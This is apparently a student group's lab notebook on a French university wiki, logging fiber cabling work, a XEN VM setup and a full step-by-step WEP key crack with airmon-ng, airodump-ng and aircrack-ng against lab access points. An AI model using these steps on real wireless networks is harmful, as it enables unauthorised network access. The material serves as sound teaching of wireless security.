Cahier 2016 groupe n°2 : Différence entre versions
(→Travail réalisé la 4ème semaine) |
(→Cahier des charges) |
||
Ligne 3 : | Ligne 3 : | ||
Câblage de la fibre: | Câblage de la fibre: | ||
+ | <br /> | ||
+ | Prise de connaissance du sujet de PRA et le choix des tâches particulières. Nous avons également commencer à essayer d'identifier les câbles de fibres déjà existants. | ||
+ | <br /> | ||
+ | Toujours sur la tâche particulière. Identification de tous les câbles déjà tirés. Test de link de chaque câble. Nous avons également commencé à passer les câbles restants. | ||
+ | Tous les câbles nécessaires ont été tirés entre les deux salles, tous les link sont up. Nous avons identifié chaque câble par un scotch de couleur différente. Nous avons également percé la gouttière de la E304 pour laisser passer un raccord de fibre proprement. | ||
+ | <br /> | ||
+ | |||
* Nous avons pu identifier les câbles déjà présents. Il y a donc 2 câbles déjà tirés entre les 2 piles, 2 câbles qui partent de la E306 jusqu'au boîtier ainsi qu'un câble par salle quid descend dans le local technique. | * Nous avons pu identifier les câbles déjà présents. Il y a donc 2 câbles déjà tirés entre les 2 piles, 2 câbles qui partent de la E306 jusqu'au boîtier ainsi qu'un câble par salle quid descend dans le local technique. | ||
* Nous allons donc prolonger les 2 câbles s'arrêtant dans le boîtier et tirer 2 nouveaux câbles entre les deux piles: nous aurons donc 6 fils au total. | * Nous allons donc prolonger les 2 câbles s'arrêtant dans le boîtier et tirer 2 nouveaux câbles entre les deux piles: nous aurons donc 6 fils au total. | ||
Ligne 16 : | Ligne 23 : | ||
[[Fichier:im7.JPG|300px|thumb|right|Trou dans le cache laissant passer la fibre]] <br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /> | [[Fichier:im7.JPG|300px|thumb|right|Trou dans le cache laissant passer la fibre]] <br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /> | ||
− | |||
− | + | === Travail commun === | |
− | |||
− | ===Travail | ||
− | |||
− | |||
− | |||
− | |||
− | |||
* Installation de la machine virtuelle XEN | * Installation de la machine virtuelle XEN | ||
* Achat du nom de domaine [http://jjlddelamuerto.space] sur Gandi pour 1.19€ TTC | * Achat du nom de domaine [http://jjlddelamuerto.space] sur Gandi pour 1.19€ TTC | ||
− | |||
− | |||
− | |||
==== Crackage de la clef WEP ==== | ==== Crackage de la clef WEP ==== | ||
+ | Nous avons fait le crack de la clé WEP sur cracotte08. | ||
Pour cracker la clef WEP, nous avons tout d'abord utiliser airmon-ng afin de voir le statut des interfaces réseau. | Pour cracker la clef WEP, nous avons tout d'abord utiliser airmon-ng afin de voir le statut des interfaces réseau. | ||
<pre> | <pre> |
Version du 7 novembre 2016 à 08:20
Sommaire
Cahier des charges
Tâche particulière
Câblage de la fibre:
Prise de connaissance du sujet de PRA et le choix des tâches particulières. Nous avons également commencer à essayer d'identifier les câbles de fibres déjà existants.
Toujours sur la tâche particulière. Identification de tous les câbles déjà tirés. Test de link de chaque câble. Nous avons également commencé à passer les câbles restants.
Tous les câbles nécessaires ont été tirés entre les deux salles, tous les link sont up. Nous avons identifié chaque câble par un scotch de couleur différente. Nous avons également percé la gouttière de la E304 pour laisser passer un raccord de fibre proprement.
- Nous avons pu identifier les câbles déjà présents. Il y a donc 2 câbles déjà tirés entre les 2 piles, 2 câbles qui partent de la E306 jusqu'au boîtier ainsi qu'un câble par salle quid descend dans le local technique.
- Nous allons donc prolonger les 2 câbles s'arrêtant dans le boîtier et tirer 2 nouveaux câbles entre les deux piles: nous aurons donc 6 fils au total.
- 2 Grands câbles de 30m ~ -> Estimation de 26m entre les 2 piles.
- 2 petits câbles de 15m ~ -> Estimation de 13m du boîtier à la pile
- Retirer le câble ethernet qui était tiré entre les 2 piles.
- 7 heures passées au total sur la tâche particulière
Travail commun
- Installation de la machine virtuelle XEN
- Achat du nom de domaine [1] sur Gandi pour 1.19€ TTC
Crackage de la clef WEP
Nous avons fait le crack de la clé WEP sur cracotte08. Pour cracker la clef WEP, nous avons tout d'abord utiliser airmon-ng afin de voir le statut des interfaces réseau.
root@zebrasoma:/home/pifou# airmon-ng Interface Chipset Driver mon0 Ralink RT2870/3070 rt2800usb - [phy1] wlan0 Broadcom wl - [phy0] wlan5 Ralink RT2870/3070 rt2800usb - [phy1]
On entre ensuite en mode monitoring sur l'interface wlan5 :
root@zebrasoma:/home/pifou# airmon-ng start wlan5 Found 2 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID Name 1986 avahi-daemon 1987 avahi-daemon Interface Chipset Driver mon0 Ralink RT2870/3070 rt2800usb - [phy1] wlan0 Broadcom wl - [phy0] wlan5 Ralink RT2870/3070 rt2800usb - [phy1] (monitor mode enabled on mon1)
Pour continuer, nous capturons les paquets transitant afin de collecter les paquets nécessaires au décryptage de la clef WEP. L'option --encrypt wep permet de filtrer uniquement les points d'accès WEP.
root@zebrasoma:/home/pifou# airodump-ng --encrypt wep wlan5 CH 5 ][ Elapsed: 0 s ][ 2016-03-31 18:36 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 44:AD:D9:5F:87:00 -42 3 0 0 3 54e. WEP WEP Wolverine 04:DA:D2:9C:50:50 -59 2 11 0 2 54e. WEP WEP cracotte01 04:DA:D2:9C:50:56 -59 3 19 0 2 54e. WEP WEP cracotte07 04:DA:D2:9C:50:59 -59 2 0 0 2 54e. WEP WEP cracotte10 04:DA:D2:9C:50:57 -59 2 15 0 2 54e. WEP WEP cracotte08 04:DA:D2:9C:50:52 -58 3 85 42 2 54e. WEP WEP cracotte03 04:DA:D2:9C:50:54 -58 1 20 9 2 54e. WEP WEP cracotte05 04:DA:D2:9C:50:55 -60 1 9 4 2 54e. WEP WEP cracotte06 04:DA:D2:9C:50:51 -59 2 134 66 2 54e. WEP WEP cracotte02 04:DA:D2:9C:50:53 -61 6 95 47 2 54e. WEP WEP cracotte04 BSSID STATION PWR Rate Lost Frames Probe 04:DA:D2:9C:50:50 00:0F:B5:92:23:75 -66 54e-48e 68 10 04:DA:D2:9C:50:56 00:0F:B5:92:23:71 -72 36e- 2e 133 19 04:DA:D2:9C:50:57 00:0F:B5:92:22:66 -66 54e-36e 89 15 04:DA:D2:9C:50:52 00:0F:B5:92:23:6A -62 54e-48e 23 84 04:DA:D2:9C:50:54 00:0F:B5:92:23:74 -66 54e-36e 576 20
Nous avons choisi de récuperer la clef WEP de cracotte03 (son BSSID est lié à une station)
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 2 -w crackWEP wlan5 CH 2 ][ Elapsed: 12 s ][ 2016-03-31 18:42 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 04:DA:D2:9C:50:52 -57 35 43 1066 87 2 54e. WEP WEP cracotte03 BSSID STATION PWR Rate Lost Frames Probe 04:DA:D2:9C:50:52 00:0F:B5:92:23:6A -64 36e-48e 1232 1067
Enfin, nous lançons le crack de la clef à l'aide de aircrack-ng :
root@zebrasoma:/home/pifou# aircrack-ng crackWEP-02.cap Aircrack-ng 1.2 beta3 [00:00:04] Tested 112801 keys (got 3050 IVs) KB depth byte(vote) 0 6/ 10 CD(5120) 15(4864) 6D(4864) 8C(4864) A7(4864) 1 46/ 1 E9(4352) 04(4096) 0E(4096) 0F(4096) 16(4096) 2 14/ 42 C8(4864) 10(4608) 11(4608) 1D(4608) 58(4608) 3 19/ 3 CF(4864) 0A(4608) 5E(4608) 8E(4608) 90(4608) 4 2/ 16 08(5632) 89(5376) 96(5376) B4(5376) F7(5376) Failed. Next try with 5000 IVs.
Il est nécessaire d'être proche du point d’accès (sinon le débit est trop faible, ce qui rend l'opération longue), ainsi que de capturer un minimum de 10 000 paquets.
Au final, nous arrivons bien à récupérer la clef WEP :
Aircrack-ng 1.2 beta3 [00:04:10] Tested 799 keys (got 42913 IVs) KB depth byte(vote) 0 0/ 1 EE(56320) B4(51712) 9D(50944) 4E(50688) 28(50432) 1 1/ 2 D9(55552) 3D(50176) 68(49664) 08(49408) 49(49152) 2 1/ 5 A2(53504) 5B(52480) 93(52480) 73(52224) 10(50432) 3 1/ 3 30(53248) 81(51456) 5B(49920) 6E(49920) 1E(49664) 4 9/ 4 9D(50176) 31(49408) 18(49152) 72(49152) E1(49152) KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] Decrypted correctly: 100%